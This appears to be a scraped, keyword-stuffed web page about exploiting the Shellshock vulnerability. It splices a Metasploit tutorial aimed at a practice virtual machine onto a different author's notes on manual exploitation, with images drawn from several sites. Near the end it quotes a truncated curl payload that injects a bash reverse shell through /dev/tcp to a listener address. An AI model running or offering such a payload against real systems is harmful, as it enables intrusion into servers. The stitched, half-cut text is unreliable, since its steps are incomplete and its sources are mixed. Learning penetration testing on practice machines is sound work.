![Metasploit shellshock](https://kumkoniak.com/102.jpg)
![metasploit shellshock metasploit shellshock](http://4.bp.blogspot.com/-QBAwMmXcriU/VDY_dxqTMkI/AAAAAAAAXaw/wgJOm8XEPoI/s1600/shellshock_metasploit_8.png)
Greetings and welcome back to the third chapter in our breathtaking, mind-blowing, life-changing discussion about penetration testing! Okay, that was maybe a bit hyperbolic. I'm just beside myself with excitement about this topic!

Let's make sure you've familiarized yourself with the context. If you need some time to catch up, read the first and second parts of this series and get up to speed. Why? Because today is judgement day – we are going to do some actual hacking! Are you pumped? Good.

Last month, we had reached a point where we discovered that our victim (reminder: I'm using this free virtual machine as my target) might be exploitable via the Shellshock vulnerability. A quick Google search revealed many tools/techniques you can use to take advantage of this specific vulnerability, but I'm going to focus on a popular tool called Metasploit. The good news is it comes built right into Kali, so there's very little configuration necessary. However, I still recommend checking out the appropriate documentation to ensure you have Metasploit set up correctly before running it. Also, if you really want to know the ins and outs of Metasploit, definitely check out some of the free online training offerings, such as the excellent resources from the folks at Offensive Security, who also offer the fantastic (and maddening!) OSCP training which we have written about in the past.

With your Kali and Metasploit up and running, let's use the search function to find exploits that might help us hack our target. One way to search is by the CVE number; CVE is a "dictionary of publicly known information security vulnerabilities and exposures." Shellshock was assigned CVE-2014-6271, so let's search for that:

From past experience, I have had good luck with the one called apache_mod_cgi_bash_env_exec, so we can load that with the use command:

![metasploit shellshock metasploit shellshock](https://www.yeahhub.com/wp-content/uploads/2019/08/upgradingshell1.png)

Stumbling upon this vulnerability recently, I paused to dig into it with the intention of getting a better understanding of manual exploitation. I've come across this vulnerability a few times in the past and I've either used Metasploit or 34900.py ("Apache mod_cgi - 'Shellshock' Remote Command Injection") to get my shell. I realize I'm talking about a four-year-old vulnerability, but it's one that still exists and it's a rabbit hole I wanted to jump into. The scanner comes back with: "Site appears vulnerable to the 'shellshock' vulnerability ()."

![metasploit shellshock metasploit shellshock](https://didierstevens.files.wordpress.com/2017/08/20170814-113626.png)

The classic examples I see in searches are the remote test: `curl -A "() /bin/bash -i >& /dev/tcp/192.168.90.`

I seem to recall having an issue with one or both at some point and I moved on to another avenue because my search results yielded bits and pieces but nothing that I could wrap my hands around.